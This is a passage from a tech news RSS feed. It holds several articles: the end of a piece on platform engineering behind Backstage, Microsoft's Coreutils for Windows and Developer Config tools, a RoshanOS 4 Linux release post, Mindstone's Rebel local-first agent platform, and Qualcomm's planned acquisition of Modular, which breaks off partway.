<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/Image_05_external_internal_agents_openchoreo.png?w=1024" alt="Image_05_external_internal_agents_openchoreo" class="wp-image-4189115" width="1024" height="584" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">WSO2</p></div>



<h2 class="wp-block-heading">From portal to platform</h2>



<p>Backstage solved the portal problem. It gave you a unified interface for catalogs, documentation, and golden paths. But a portal isn’t a platform. There’s a gap between what developers see and what’s actually running, and that’s where you get stuck. You fill it with point-to-point integrations, custom plugins, and scripts that become their own maintenance burden.</p>



<p>The pattern that works is portal, control plane, data plane: </p>



<ul class="wp-block-list">
<li>A portal that gives developers ready access to catalogs, documentation, and templates.</li>



<li>A control plane that compiles platform abstractions, reconciles drift, and aggregates runtime state.</li>



<li>A data plane that runs workloads and enforces guarantees.</li>
</ul>



<p>Whether you build this yourself or you adopt something like OpenChoreo, the architecture matters more than the tools. Get the layers right, and new capabilities slot in cleanly. Get them wrong, and every feature request becomes a project.</p>



<p>Backstage gives you the front door. The real platform begins behind it.</p>



<p><em>—</em></p>



<p><a href="https://www.infoworld.com/blogs/new-tech-forum"><strong><em>New Tech Forum</em></strong></a><em><strong> provides a venue for technology leaders—including vendors and other outside contributors—to explore and discuss emerging enterprise technology in unprecedented depth and breadth. The selection is subjective, based on our pick of the technologies we believe to be important and of greatest interest to InfoWorld readers. InfoWorld does not accept marketing collateral for publication and reserves the right to edit all contributed content. Send all </strong></em><em><strong>inquiries to </strong></em><a href="mailto:doug_dineley@foundryco.com"><strong><em>doug_dineley@foundryco.com</em></strong></a><em><strong>.</strong></em></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Making Windows a developer platform, again]]></title>
<description><![CDATA[Microsoft has been rethinking its commitment to Windows for a while now, with Insider builds of the operating system showing a swing away from web-based user experiences and back to native code. That commitment got a boost at Build 2026 with a bundle of announcements that focused on tools and fea...]]></description>
<link>https://tsecurity.de/de/3623950/ai-nachrichten/making-windows-a-developer-platform-again/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623950/ai-nachrichten/making-windows-a-developer-platform-again/</guid>
<pubDate>Thu, 25 Jun 2026 11:34:08 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft has been rethinking its commitment to Windows for a while now, with Insider builds of the operating system showing a swing away from web-based user experiences and back to native code. That commitment got a boost at Build 2026 with a <a href="https://blogs.windows.com/windowsdeveloper/2026/06/02/build-2026-furthering-windows-as-the-trusted-platform-for-development/" data-type="link" data-id="https://blogs.windows.com/windowsdeveloper/2026/06/02/build-2026-furthering-windows-as-the-trusted-platform-for-development/">bundle of announcements</a> that focused on tools and features that help developers take advantage of the platform.</p>



<p>The most obvious is support for the standard core Unix utilities, in the shape of a Microsoft-maintained fork of the popular <a href="https://github.com/uutils/coreutils">Rust-based uutils coreutils package</a>, <a href="https://github.com/microsoft/coreutils">Coreutils for Windows</a>. Coreutils for Windows installs as a single binary, making it easier to update and manage. And it is one of those tools that does exactly what it says on the tin, providing a Windows implementation of the commands you’re using in Linux virtual machines or in Windows Subsystem for Linux (WSL).</p>



<h2 class="wp-block-heading">Building on Windows Terminal with Coreutils</h2>



<p>Much of the Windows developer experience has moved back to the command line via Windows’ rearchitected terminal, underscoring the need for a consistent experience across the multiple development environments running on your PC. The context switch between a Linux environment through WSL or in a Visual Studio remote terminal and the Windows PowerShell and cmd environment can be jarring.</p>



<p>I often find myself typing a Unix command in Windows and vice versa, seeing an all-too-familiar error message, followed by trying to remember what I should have typed, and finally trying again. It wastes time and fills my terminal buffer with junk.</p>



<p>Microsoft Coreutils solves the problem by handling Unix commands for me. It not only provides the same command syntax, but also formats the output correctly. It’s a little odd seeing a well-presented directory listing in Windows when typing <code>ls -al</code>. But once you get used to it, having the same experience on all your systems saves time and avoids having to switch context every time you open a new terminal tab or when you switch back from a SSH session.</p>



<p>There’s another advantage to having Coreutils in Windows: scripts written for a Unix system will port to Windows. This can help with common operations, like builds, or writing your own custom functions.</p>



<p>It’s important to note that Coreutils for Windows is only a preview for now, and not all the Coreutils functions are fully implemented. There are inevitably conflicts with existing cmd and PowerShell commands, so for example, Microsoft’s Coreutils doesn’t ship with the familiar <code>more</code> or <code>dir</code> commands. Other commands, like <code>kill</code>, can’t be implemented at present because Windows doesn’t support the Unix signals model. And still others won’t ship because they’re based on low-level Unix concepts, like groups and owners, that are part of POSIX but not Windows. Microsoft provides a list of other issues on the project’s <a href="https://github.com/uutils/coreutils/blob/main/README.md" data-type="link" data-id="https://github.com/uutils/coreutils/blob/main/README.md">GitHub Readme</a>, along with suggestions for alternatives that can be helpful. For example, as Windows doesn’t have <code>/dev/null</code>, you can replace it with <code>NUL</code> in scripts.</p>



<p>Getting started is simple. You can download the latest release from GitHub or use winget to download and install from the command line. For now, I’d recommend using winget, as it provides an update mechanism as well as an uninstaller. It’s well worth adding to your Windows environment. It is already making my life a lot easier.</p>



<h2 class="wp-block-heading">Fast track setup with Windows Developer Config</h2>



<p>Another important tool that gets a public release is <a href="https://github.com/microsoft/WindowsDeveloperConfig/">Windows Developer Config</a>. This builds on the techniques used to configure <a href="https://www.infoworld.com/article/2335553/microsoft-dev-box-your-development-workstation-on-azure.html">cloud-hosted Microsoft Dev Boxes</a> and brings them to any Windows PC, <a href="https://github.com/microsoft/WindowsDeveloperConfig/blob/main/windows-dev-config/README.md">using winget and other tools to build out a ready-to-run development PC</a>. Dev Configs aren’t only for Windows. They also work on Linux VMs or in WSL, so that all the environments you use to write code can be configured with your tool chains and more.</p>



<p>There are three parts to the Dev Config process: a set of <a href="https://www.infoworld.com/article/2263233/getting-started-with-winget-the-windows-package-manager.html">winget configurations</a> to install familiar tools and tune Windows, a set of scripts to enable cloud-native development scenarios and workloads, and a set of scripts that configure WSL to work with your choice of shell, distribution services like Homebrew, and your distribution’s installation and update mechanisms.</p>



<p>The three options are open source, with all the necessary files on GitHub. It’s important to note that while the tooling is opinionated, it’s not prescriptive. If you want to extend the winget configuration to add a feature like Coreutils, you can. The default configuration is intended to be the same as that delivered when you spin up a Dev Box Cloud PC virtual machine, and the tooling uses the same techniques including the PowerShell-based Desired State Configuration to ensure that existing tools are updated as necessary.</p>



<p>Having a service that delivers the same environment as a Dev Box makes perfect sense. Microsoft has been using these tools internally, and its fast network makes Cloud PCs easy to use. However, that’s not the case for all of us, where slow networks and cloud latencies make it hard to use hosted virtual environments. We might even want to use those resources when we’re on the move, working with checked-out Git repositories on a train or in a plane, where bandwidth is not reliable.</p>



<p>Setting up a PC with the base Dev Config is as easy as it should be. Winget’s configuration service runs on both new and old PCs, installing applications where needed, running updates where necessary, and applying the necessary developer settings to Windows. You can download the scripts by cloning a GitHub repository (if Git is already installed) or by downloading a zip archive. Microsoft provides instructions for both options, along with the command and options used to start the process. Your PC may reboot as part of the process of installing WSL, but the script is designed to restart once it’s up and running again. It’s idempotent, so you can run it regularly to avoid configuration drift.</p>



<p>The apps installed include the latest PowerShell, Git, CLIs for GitHub, GitHub Copilot, the <a href="https://www.infoworld.com/article/4132938/working-with-the-windows-app-development-cli.html">Windows App SDK</a>, <a href="https://www.infoworld.com/article/2335960/what-is-visual-studio-code-microsofts-extensible-code-editor.html" data-type="link" data-id="https://www.infoworld.com/article/2335960/what-is-visual-studio-code-microsofts-extensible-code-editor.html">Visual Studio Code</a>, and language support for Node.js, Python, and .NET. The install brings in developer-friendly fonts and a theme engine for the Windows Terminal. Other features include customizing File Explorer and the Windows Task Bar, as well as hiding notifications to improve focus.</p>



<h2 class="wp-block-heading">Tweaking WSL for Comfort</h2>



<p>With WSL installed, you can use <a href="https://github.com/microsoft/WindowsDeveloperConfig/blob/main/wsl-comfort/readme.md">the WSL Comfort scripts</a> to install additional tools and customize Windows Terminal. This is a two-part tool. The Windows part ensures WSL and Ubuntu are installed and sets up fonts and terminal profiles. The Linux part then tunes the WSL environment, with the option of switching to zsh and using <a href="https://starship.rs/">the starship terminal display tools</a>. It then adds a series of popular CLIs and support for the Homebrew package installer. You don’t need to install a new Linux distribution in WSL; you can target your existing Ubuntu instance.</p>



<p>The result is a developer-focused WSL installation with much of the required configuration already installed, along with the basis of a Linux development toolchain — including some of my favorite tools that are already part of my default install. With this new script I don’t have to install them manually (and configure necessary apt repositories); it’s all automated.</p>



<p>The underlying winget configuration tools can be used to prepare your development PC for specific workloads. These are installed in a workload directory and set up your environment to work with your choice of platforms. This way you can have all the tools you need to work with TypeScript or Java ready to go. Some of the workload installers download a lot of resources. If you’re setting up for WinUI 3 development, for example, be prepared to download several gigabytes of Visual Studio and the Windows Application SDK. This will take time and will overload a machine or VM without the required space.</p>



<p>There are a lot of tools here, with more on the way. The roadmap includes plugins for the Windows PowerToys command palette, putting Windows Dev Config a few keystrokes away from your desktop. Microsoft is finally filling one of Windows’ missing pieces, providing a quick and easy way to build a developer-ready environment that can be customized to work the way you want. For development teams, these tools enable the consistency across environments needed to share code and ideas, along with being able to pick any keyboard and start working without having to worry about the time needed to learn someone else’s setup.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[RoshanOS 4 – Improved MX Linux + KDE Build Aimed at Beginners Switching from Windows]]></title>
<description><![CDATA[Hi r/linux, Over the years I've released a few versions of RoshanOS. I know the Linux community is generally skeptical of new respins — and with good reason. Honest context on earlier versions: RoshanOS 1 and 1.1 were based on Linux Mint and built using the older Systemback tool.  RoshanOS 4 (rel...]]></description>
<link>https://tsecurity.de/de/3623265/linux-tipps/roshanos-4-improved-mx-linux-kde-build-aimed-at-beginners-switching-from-windows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623265/linux-tipps/roshanos-4-improved-mx-linux-kde-build-aimed-at-beginners-switching-from-windows/</guid>
<pubDate>Thu, 25 Jun 2026 05:09:36 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hi <a href="https://www.reddit.com/r/linux">r/linux</a>,</p> <p>Over the years I've released a few versions of RoshanOS. I know the Linux community is generally skeptical of new respins — and with good reason.</p> <p>Honest context on earlier versions:<br> RoshanOS 1 and 1.1 were based on Linux Mint and built using the older Systemback tool. </p> <p>RoshanOS 4 (released May 2026) is a full rebuild:</p> <ul> <li>Base: Current MX Linux (Debian Stable) with its solid tooling and long-term support</li> <li>Desktop: KDE Plasma</li> <li>Build process: Using MX Snapshot (MX Tools) </li> <li>Size: ~5.6 GB ISO</li> </ul> <h1>Notable changes &amp; features:</h1> <ul> <li>Much improved hardware portability thanks to proper remastering</li> <li>Pre-configured programming tryouts (Python, C/C++, Java, etc.)</li> <li>Screen edge gestures and other KDE workflow tweaks</li> <li>Pro edition with additional support layers for Windows and Android apps</li> <li>Comprehensive included documentation</li> </ul> <p>This is not positioned as a replacement for mainstream or minimalist distros. It’s my attempt at a polished, productive daily driver with a curated selection of packages on a reliable base.</p> <p>I’m posting mainly to get technical feedback from experienced users. If you try the live session, I’d appreciate notes on stability, hardware behavior, packaging choices, or anything that stands out (good or bad).</p> <p>Links:</p> <ul> <li>DistroWatch: <a href="https://distrowatch.com/roshanos">https://distrowatch.com/roshanos</a></li> </ul> <p>Thanks for any time you spend looking at it.</p> <p>(asakpke – RoshanTech)</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/asakpke"> /u/asakpke </a> <br> <span><a href="https://i.redd.it/tyuzuwd0dc9h1.png">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uexta1/roshanos_4_improved_mx_linux_kde_build_aimed_at/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your enterprise AI agents should automatically remember which model is right for which task. Mindstone built the capability with Rebel]]></title>
<description><![CDATA[AI agent orchestration platforms are popping up like weeds these days, but London-based AI transformation startup Mindstone's Rebel might be among the most promising I've come across. That's because the system, which officially launched this week, is a local-first, agentic AI operating system dis...]]></description>
<link>https://tsecurity.de/de/3623122/it-nachrichten/your-enterprise-ai-agents-should-automatically-remember-which-model-is-right-for-which-task-mindstone-built-the-capability-with-rebel/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623122/it-nachrichten/your-enterprise-ai-agents-should-automatically-remember-which-model-is-right-for-which-task-mindstone-built-the-capability-with-rebel/</guid>
<pubDate>Thu, 25 Jun 2026 02:16:58 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>AI agent orchestration platforms are popping up like weeds these days, but London-based AI transformation startup Mindstone's <a href="https://www.producthunt.com/products/mindstone-rebel">Rebel</a> might be among the most promising I've come across. </p><p>That's because the system, which officially launched this week, is a local-first, agentic AI operating system distributed under a "<a href="https://fair.io/about/">Fair Source</a>" license, allowing teams of under 100 users to freely adopt and customize it to suit their needs, while those organizations with more users will require paying for an enterprise license. </p><p>The marquee features are its simplicity and extensive customizability to fit any given team, no matter how unique or specific the workflows, all based around the common, open source standard file format markdown, and, as a result, an organizational memory layer that ensures agents reliably use the enterprise's preferred AI models for each given task or even subtasks — dynamically switching between local and cloud ones in a predictable, visible way to save costs and maintain data privacy and security as needed. </p><p>"Shared memory is the most empowering thing you could possibly do with a knowledge-worker AI," said Greg Detre, chief technology officer (CTO) of Mindstone, in a recent video call interview with VentureBeat. "You get this feeling of being a super-organism as a company that just gets smarter and smarter."</p><p>Rebel is available now for macOS on Intel and Apple Silicon machines, as well as Windows, with Linux support in development.</p><p>Mindstone has raised $5 million from private investors including Pearson Ventures, Moonfire Ventures and Zanichelli Venture. </p><h2><b>A distinctive, local-first architecture based on markdown files</b></h2><p>What makes Rebel distinctive is its local-first architecture. </p><p>Instead of the approach found in developer-heavy agent frameworks such as as LangGraph, CrewAI and AutoGPT, which require teams to wire together databases, cloud infrastructure and state-management logic, Rebel's core agent memory and instructions live across local markdown (<code>.md</code>) text files — <a href="https://www.reddit.com/r/AI_Agents/comments/1t6ed3l/hot_take_markdown_is_the_file_format_of_the_ai_era/">arguably</a> the simplest, easiest, and most popular way to steer AI agents, one that has been widely adopted by AI developers and power users around the globe. </p><p>Mindstone says Rebel stores its state, prompts, task instructions and memory hierarchy in these files, allowing users and companies to easily inspect, move or modify them as needed. A primary configuration file, <code>agents.md,</code> acts as the agent’s core instruction layer and runtime boundary.</p><p>That architectural choice is partly about cost. Mindstone argues that common office formats such as Word documents and PDFs often carry formatting and metadata overhead that consumes model token context and raises API costs. Markdown keeps the information closer to raw text, allowing more of the model’s context window to be spent on the actual task rather than document structure.</p><p>The company also positions the approach as a hedge against vendor lock-in. If a company’s agent instructions, automations and memory are stored locally as text files, they are not trapped inside one SaaS provider’s interface or database. That matters more as enterprises begin giving AI systems broader access to email, calendars, documents and internal workflows.</p><p>Rebel also lets users create repeatable AI workflows. “Skills” are saved multi-step procedures an agent can reuse.  “Operators” adjust how the agent behaves for a given task, such as reviewing a pitch deck from an investor’s perspective or evaluating work through a security lens. “Automations” can run scheduled background tasks, such as scanning messages or files, finding relevant updates, drafting responses, or preparing work before an employee opens the app. </p><h2><b>Automatically selecting the best, enterprise-preferred AI model for every task (and subtask)</b></h2><p>Another important feature is multi-model orchestration. Rebel can <i>break a task into parts and route different steps </i>to<i> different models, </i>including splitting between local and cloud-based ones depending on the sensitivity of the information or as guided by enterprise policies. </p><p>A more powerful model can handle planning or complex reasoning; a cheaper model can handle routine work; a local model can handle sensitive steps or approval checks. This matters for enterprises that want flexibility or are seeking cost controls: not every task need be sent to the same expensive cloud model, and some enterprise workflows prohibit sensitive corporate data leaving local infrastructure.</p><p>“I want to be able to say, ‘Help me with this,’ and it knows what’s personal, what’s sensitive, and what can be shared with the whole company," Detre explained. </p><p>That model-agnostic setup gives companies more control over cost and security. Data-heavy work can run on lower-cost models such as Llama or DeepSeek. Higher-level reasoning can be reserved for more expensive models. Sensitive work can be routed through a local model running on the user’s machine, keeping that information from leaving the device.</p><p>This approach also gives enterprise teams a way to mix cloud and local inference without treating the choice as all-or-nothing. </p><p>By shifting away from centralized, monolithic cloud interfaces toward a local file-driven architecture, Mindstone is introducing a model for how enterprise technical decision-makers orchestrate autonomous workflows without forfeiting data sovereignty or predictability</p><h2><b>How it works in practice</b></h2><p>Mindstone CTO Greg Detre designed Rebel’s memory system to avoid a common problem in enterprise AI: dumping large amounts of company information into a database and hoping search will retrieve the right context later.</p><p>Instead, Rebel uses a tiered memory structure. When an interaction happens, the system estimates how likely that information is to be useful again. </p><p>Information with a high expected value is written into a local readme.md file tied to a specific project space. Information with a moderate expected value becomes a reference link back to deeper historical records. </p><p>Lower-priority material is stored in an indexed memory directory, where it remains available but dormant until a relevant task calls it back.</p><h2><b>An ROI dashboard for enterprise buyers</b></h2><p>For larger organizations, Mindstone Pro adds an Impact Dashboard designed to show where Rebel is saving time and money across business units.</p><p>Mindstone says the dashboard uses a separate, closed LLM to evaluate telemetry and calculate business impact. The company says the system is calibrated conservatively, using the lower end of estimated performance gains to avoid inflated productivity claims.</p><p>That feature speaks to a practical problem for enterprise AI buyers: proving value without over-surveilling employees. Mindstone says the dashboard is isolated from individual workspaces, allowing IT and business leaders to evaluate adoption and return on investment without reading employees’ private agent activity.</p><h2><b>Fair Source licensing aims to reduce platform risk</b></h2><p>Mindstone is releasing Rebel under a Fair Source license, a model meant to sit between fully closed SaaS and permissive open source.</p><p>Under the license, Rebel’s code is viewable, auditable, modifiable and deployable. Individuals and organizations with up to 100 concurrent users can run it for free. Once an organization exceeds that threshold, it needs a commercial Mindstone Pro license.</p><p>The license also includes a two-year sunset clause. Twenty-four months after a given version is released, that version automatically converts to the MIT open-source license.</p><p>For enterprise buyers, the practical pitch is that Rebel reduces the risk of being trapped. If every automation, memory file and agent instruction is stored locally in markdown, a company can move its data and workflows elsewhere if needed. The product may be commercial, but the underlying work is designed to remain inspectable and portable.</p><h2><b>Security questions focus on local approvals and shared memory</b></h2><p>Rebel’s <a href="https://www.producthunt.com/products/mindstone-rebel">debut on the open access tech product sharing platform Product Hunt</a> this week prompted technical questions about how a local-first agent should handle permissions, safety checks and shared memory.</p><p>One developer, Nikita Pokryschko, asked whether approval checks for sensitive actions could run entirely on a local model, or whether the gating logic still required a cloud call.</p><p>Detre responded by explaining Rebel’s separation between planning, execution and background safety logic. Wöhle added that companies can configure Rebel to rely entirely on a local model for gating decisions.</p><p>That distinction matters for corporate security teams. Autonomous agents often need broad permissions to read files, draft emails or interact with internal systems. If the final approval layer depends on an external cloud model, some companies may see that as a compliance risk. Mindstone is arguing that Rebel can keep those approval boundaries local.</p><p>A second discussion focused on how Rebel decides what memory can be shared. Product developer Clement Morel asked whether shareability is determined by content, user settings or learned behavior, and what happens if the system gets it wrong.</p><p>Detre said Rebel uses the user’s local “Chief-of-staff README” and defined spaces to separate private, team and company-wide information. When the agent encounters ambiguous context, the system pauses and asks the user for approval before proceeding.</p><p>That emphasis on visibility is part of Mindstone’s broader argument against opaque agent systems. As CEO Joshua Wöhle put it <a href="https://www.linkedin.com/posts/joshuawohle_practicalai-futureofwork-aiagents-share-7475458987870769153-VtgH/?utm_source=share&amp;utm_medium=member_desktop&amp;rcm=ACoAAAKTlTEBUrAfv-7hEwobIAwDLQPbtm2dljo">in a post on his LinkedIn account</a>: “If an agent is going to sit inside your workspace, remember your context, and ask permission before changing the world, you should be able to see how it works. Not because everyone will read the code, but because someone can.”</p><h2><b>Mindstone points to customer rollout as early proof</b></h2><p>Mindstone says Rebel has already been deployed across the 250-person workforce of customer Epignosis, covering sales, engineering, product, finance and customer success teams.</p><p>"The entire organization is operating on Rebel today," Wöhle told VentureBeat.</p><p>Over a 12-week deployment, Mindstone says Epignosis recaptured the equivalent capacity of eight full-time roles. The company says adoption spread organically after employees saw colleagues automate time-consuming work, a pattern employees reportedly called the “potatoes effect.”</p><p>The Epignosis case is central to Mindstone’s argument that enterprise AI should not be treated as a set of isolated personal tools. Rebel’s shared-memory design is meant to let workflows move across teams and improve as more employees use them.</p><p>“The border between learning and doing is fading out - and that changes everything about how you scale,” Epignosis CEO Dimitris Tsingos said in a statement provided to VentureBeat by Mindstone.</p><h2><b>Background on Mindstone</b></h2><p>Mindstone Learning Limited, headquartered in London,<a href="https://startupintros.com/orgs/mindstone"> launched in 2020</a> under the direction of CEO Joshua Wöhle, previously a co-founder of the digital child safety firm SuperAwesome. Originally positioned in the consumer education technology market, the company built a digital curation tool likened to a "Spotify for learning" that utilized compound learning methodologies. </p><p>However, following the widespread commercialization of generative artificial intelligence platforms between 2022 and 2024,<a href="https://www.linkedin.com/posts/joshuawohle_futureofwork-practicalai-augmentationnotautomation-activity-7304173952589836288-WWHe/"> Mindstone moved </a>into business-to-business enterprise enablement. Leadership identified a critical "last-mile" barrier: while AI tools promised substantial productivity gains, traditional corporate training failed to equip the workforce to practically integrate them into daily operations.</p><p>Today, Mindstone functions as a comprehensive enterprise software and training ecosystem designed to maximize corporate return on investment for existing AI licenses. The product architecture systematically addresses different organizational tiers through highly contextualized, "live-fire" software applications rather than abstract slide presentations. </p><p>Financially, Mindstone utilizes a hybrid capitalization strategy that interweaves institutional venture capital from entities like Moonfire Ventures and Pearson Ventures with community-based equity crowdfunding on platforms such as Seedrs and Crowdcube. </p><p>Mindstone has successfully penetrated the enterprise market, securing commercial contracts with blue-chip corporations including The Home Depot, Hyatt Hotels Corporation, Pearson, and Ernst &amp; Young. </p><p>Ultimately, Mindstone positions itself as the crucial antidote to corporate inertia, ensuring organizations establish the internal competency required to execute successful AI transformations.</p><h2><b>Mindstone’s bet: enterprise AI needs shared memory, not more seats</b></h2><p>Rebel arrives as companies are trying to move from AI experimentation to AI operations. The first wave of enterprise adoption centered on access: giving employees chatbots, copilots and model subscriptions. Mindstone is betting the next wave will center on coordination.</p><p>That means shared memory, reusable workflows, local control, flexible model routing and measurable business impact. It also means giving enterprises a way to inspect the systems they are being asked to trust.</p><p>The company’s challenge now is execution. Local-first software can be harder to manage than cloud SaaS. Shared memory raises governance questions. Multi-model routing adds complexity. And enterprises will still need proof that agentic workflows can deliver reliable productivity gains without creating security or compliance headaches.</p><p>But Mindstone is making a clear argument: buying AI seats is not the same as building AI infrastructure. Rebel is its attempt to turn scattered employee experiments into an operating layer for work.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Qualcomm’s $3.9 billion purchase of Modular aims to change the data center dynamic]]></title>
<description><![CDATA[Qualcomm on Wednesday said that it will spend $3.9 billion to purchase AI-native software platform developer Modular Inc., a move that Qualcomm says will allow it to level the playing field on data centers by creating “a silicon-agnostic compute layer.”



The stock-based acquisition “further ena...]]></description>
<link>https://tsecurity.de/de/3622741/it-security-nachrichten/qualcomms-39-billion-purchase-of-modular-aims-to-change-the-data-center-dynamic/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622741/it-security-nachrichten/qualcomms-39-billion-purchase-of-modular-aims-to-change-the-data-center-dynamic/</guid>
<pubDate>Wed, 24 Jun 2026 22:24:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Qualcomm on Wednesday said that it will spend $3.9 billion to purchase AI-native software platform developer Modular Inc., a move that Qualcomm says will allow it to level the playing field on data centers by creating “a silicon-agnostic compute layer.”</p>



<p>The <a href="https://d18rn0p25nwr6d.cloudfront.net/CIK-0000804328/70441e71-4fcb-4cdd-8874-f571622bd264.pdf" target="_blank" rel="noreferrer noopener">stock-based acquisition</a> “further enables Qualcomm Technologies to deliver a silicon-agnostic compute layer across devices, edge, and data centers, improving performance-per-watt, increasing hardware flexibility, and expanding an open developer ecosystem so customers can deploy AI more efficiently across heterogeneous platforms globally,” the company said <a href="https://investor.qualcomm.com/news-events/press-releases/news-details/2026/Qualcomm-to-Acquire-Modular/default.aspx" target="_blank" rel="noreferrer noopener">in a statement</a>. </p>



<p>Qualcomm’s position is that enterprises need far more flexibility in their data center strategies, especially given how fluid the AI space is today. When CIOs need to make bets on data centers without knowing what the field will look like in two years, it can be challenging.</p>



<p><a href="https://www.linkedin.com/in/chris-lattner-5664498a/" target="_blank" rel="noreferrer noopener">Chris Lattner</a>, CEO of Modular, posted on LinkedIn that this leveling of the data center playing field was one of the company’s key early goals.</p>



<p>“In a world with a tremendous amount of innovative heterogenous AI hardware, there has always been a gap: existing fragmented software technologies weren’t built to scale effectively across this hardware. This gap holds back innovation and choice and makes development painful,” Lattner <a href="https://www.linkedin.com/posts/chris-lattner-5664498a_im-excited-to-share-that-qualcomm-is-acquiring-share-7475540410514288640-LvCv/" target="_blank" rel="noreferrer noopener">wrote in his LinkedIn post</a>.</p>



<p>“Modular was founded 4.5 years ago to solve this problem,” he wrote. “We’ve already integrated support for several hyperscale datacenter silicon providers, but we’re not stopping with what’s publicly announced. We’ve built an open platform and are continuing to open it further.”</p>



<p>Lattner added that the Qualcomm acquisition “will accelerate our progress and path” by “spanning edge to cloud, CPU, GPU, NPU, and custom ASICs and perhaps more.”</p>



<h2 class="wp-block-heading">Addresses a pain point</h2>



<p>Analysts, although skeptical of the probability of success in taking meaningful market share away from Nvidia, said that Qualcomm has focused on a true sore point for enterprises struggling with data center approaches. </p>



<p><a href="https://moorinsightsstrategy.com/team/matt-kimball/" target="_blank" rel="noreferrer noopener">Matt Kimball</a>, VP and principal analyst with Moor Insights &amp; Strategy, said, “the argument that Modular can make datacenters cost-effective is directionally correct. As enterprise AI actually hits velocity, heterogeneity is almost an understatement. Different accelerators are required for different use cases across different deployment scenarios.”</p>



<p>To date, it’s been a challenge for organizations to manage AI in this environment, he noted. “And when enterprise AI takes off, this challenge will be fully exposed.”</p>



<p>Kimball said that Modular “can be extremely valuable in achieving two things that will vex most organizations: abstracting complexity and delivering significantly more flexibility. And this would certainly lead to TCO advantages. I think the per-watt performance claim can be challenging to validate across every and any deployment scenario, but I understand the spirit behind it.”</p>



<p><a href="https://www.linkedin.com/in/yurigoryunov/" target="_blank" rel="noreferrer noopener">Yuri Goryunov</a>, CIO of consulting firm Acceligence, also applauded the Qualcomm move, but he stressed that the deal’s value is not in the technology as much as in the talent.</p>



<p>“The key is what Qualcomm actually bought: not silicon, but the software layer, meaning Chris Lattner’s team plus Mojo and the MAX engine. That’s the right place to apply pressure. Nvidia’s real moat has never been the GPUs,” he said. “It’s CUDA and the rewrite cost that keeps workloads pinned to their hardware. A credible ‘write once, run across CPU/GPU/NPU/ASIC without rewrites’ layer is exactly what lowers the switching cost and makes non-Nvidia silicon a safer bet.”</p>



<p>But Goryunov said that the data center “democratization” argument also is powerful.</p>



<p>“Anything that pushes toward democratization of compute and better routing of tasks to best-fit capacity adds real flexibility to the ecosystem,” he noted. “If workloads can be matched to the right compute instead of defaulting to one vendor, everyone gets more efficiency on performance-per-watt and TCO and customers get real choice. That’s the part of this I find most compelling.”</p>



<h2 class="wp-block-heading">Still some obstacles</h2>



<p>That said, none of this will be easy, he pointed out.</p>



<p>“Does it change the competitive position versus Nvidia? Directionally, yes. It opens a credible second front at the exact point where Nvidia is stickiest. I’d stop short of saying it shifts the balance overnight. CUDA’s moat is a decade deep and this is a multi-year execution play,” Goryunov said. “But the attack is aimed at the right wall and the team they bought is about as serious as it gets for this fight.”</p>



<p>But he stressed that much of Qualcomm’s strategy with this acquisition relies on an uncertain assumption: That Nvidia won’t counterattack by opening its architectures to various others. Or, at the very least, that Nvidia won’t do so quickly enough.</p>



<p>“That’s the barrier to entry, which is that Nvidia will focus on their stickiness,” Goryunov said.</p>



<p>Kimball added that, from a competitive perspective, Qualcomm has various obstacles to overcome. “Part of this acquisition goes directly to the Nvidia challenge” of finding a way to “make it easier for customers to deploy heterogeneous silicon without software getting in the way.”</p>



<p><a href="https://www.infotech.com/profiles/john-annand" target="_blank" rel="noreferrer noopener">John Annand</a>, senior technical counselor at Info-Tech Research Group, is more skeptical of Qualcomm’s ability to do serious damage to Nvidia.</p>



<p>“Nvidia has something like 85% of the AI accelerator chip market,” he pointed out. “Sure, they have nowhere to go but down, but that’s still going to take them a while. More importantly, they have literally spent decades working with practitioners in AI and ML and compute-intensive fields, indoctrinating them into their CUDA software ecosystem. Rewriting that tool chain will take institutional change at most organizations, which means years, if not decades, to uncouple.”</p>



<p>“Organizations that think they’ve achieved agnosticism because they’re using high-level abstractions like PyTorch, well,  they have come closest,” he observed. “But just cutting and pasting the same code into AMD Instinct can lead to memory and dependency errors. It’s like VM lift and shifts to the public cloud 10 years ago. Easier, but still possible to screw up.”</p>



<p>Nonetheless, Annand said that the deal, if it goes through, is still good news for enterprises. </p>



<p>“What it means for enterprise IT is that the vendors we currently rely on to deliver AI have another potential building block. Because enterprise IT accesses AI via an API call, it’s operationally irrelevant to us if Claude runs on Nvidia, AMD ROCm, or Modular,” he said. </p>



<p>“Now, because of the commercial and stock agreements, OpenAI and Anthropic aren’t going to jump ship anytime soon. But if your enterprise is looking for more boutique offerings, like those from Cohere, or is looking to build its own models and tools from scratch, this is an exciting announcement.”</p>



<h2 class="wp-block-heading">Goal: build once, run anywhere</h2>



